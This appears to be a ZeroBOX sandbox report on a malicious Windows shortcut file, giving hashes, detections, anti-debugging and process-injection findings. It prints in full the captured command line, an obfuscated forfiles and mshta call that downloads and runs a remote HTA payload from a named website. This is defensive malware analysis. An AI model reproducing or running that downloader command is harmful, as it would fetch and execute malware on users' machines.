Favorites
Tools
Dr.Zero Chatbot
Notifications
Guide 2020-06-10
Version history 2020-06-10

latestReport
09.20 01:09
setup.exe
09.20 11:09
3uTools.exe
09.20 11:09
66ecb4573225b_vsbhfdg1...
09.20 10:09
66ecb452ba19c_sfbdsgfd...
09.20 10:09
66ecb44c35444_vfdhsgdf...
09.20 10:09
66ec0e61998bf_setup30.exe
09.20 10:09
66ebf725efe38_lyla.exe
09.20 10:09
Desktop_Explorer.exe
09.20 10:09
66ec3528901bb_winupdat...
09.20 10:09
Inquiry-Dubai.js

Latest News
09.20 09:09
Critical Vulnerability...
09.20 09:09
Amazon Fire TV Stick S...
09.20 09:09
[NEU] [mittel] Red Hat...
09.20 09:09
Passwordless AND Keyle...
09.20 09:09
[UPDATE] [mittel] IBM ...
09.20 08:09
Farmers Look to AI-Pow...
09.20 08:09
Microsoft’s AI Power N...
09.20 08:09
Simplify NIS2 complian...
09.20 08:09
COBB Tuning Hit With $...
09.20 08:09
Iranian APT UNC1860 Li...

Summary | ZeroBOX

client_upd.lnk

Generic Malware AntiVM Lnk Format AntiDebug GIF Format

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Sept. 8, 2023, 4:09 p.m.	Sept. 8, 2023, 4:11 p.m.

Size	2.0KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=79, Archive, ctime=Sat Dec 7 00:09:57 2019, mtime=Sat Sep 2 07:33:26 2023, atime=Sat Dec 7 00:09:57 2019, length=41472, window=hidenormalshowminimized
MD5	`b67e9a5be90034b0814412603f5ba09e`
SHA256	`82a78bf48a26c07f60ae2cc035992894bf8584e28c881c32b19ce620fa10c8fa`
CRC32	`94D6F319`
ssdeep	`24:8XoEMu4JPpyA1k8WfyMUIsyMb+UHKb+/4Y5ws4flBsaW/ab/2XTfm:8X/Mum7IYgLflBsnab2jf`
Yara	lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "lqHVbMaXL" C:\Users\test22\AppData\Local\Temp\client_upd.lnk
3024
- forfiles.exe "C:\Windows\System32\forfiles.exe" /p \Windows\SKB /c "powershell . \*i*\S*3*\m*ta.e* https://embutidoskami.sdb.bo/wp-content/uploads/2015/06/HDDREQ.hta
  2208

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Sept. 8, 2023, 4:09 p.m.	buffer: ERROR: The specified directory does not exist. console_handle: 0x0000000b	1	1	0

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\client_upd.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\forfiles.exe" /p \Windows\SKB /c "powershell . \*i*\S*3*\m*ta.e* https://embutidoskami.sdb.bo/wp-content/uploads/2015/06/HDDREQ.hta

File has been identified by 5 AntiVirus engines on VirusTotal as malicious (5 events)

Symantec	CL.Downloader!gen111
Kaspersky	HEUR:Trojan.WinLNK.Agent.gen
Sophos	Troj/LnkObf-W
ZoneAlarm	HEUR:Trojan-Downloader.WinLNK.Powedon.gen
Google	Detected

Yara rule detected in process memory (8 events)

description	(no description)				rule	DebuggerCheck__GlobalFlags
description	(no description)				rule	DebuggerCheck__QueryInfo
description	(no description)				rule	DebuggerHiding__Thread
description	(no description)				rule	DebuggerHiding__Active
description	(no description)				rule	ThreadControl__Context
description	(no description)				rule	SEH__vectored
description	Checks if being debugged				rule	anti_dbg
description	Bypass DEP				rule	disable_dep

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3024 resumed a thread in remote process 2208
NtResumeThread Sept. 8, 2023, 4:09 p.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2208	1	0	0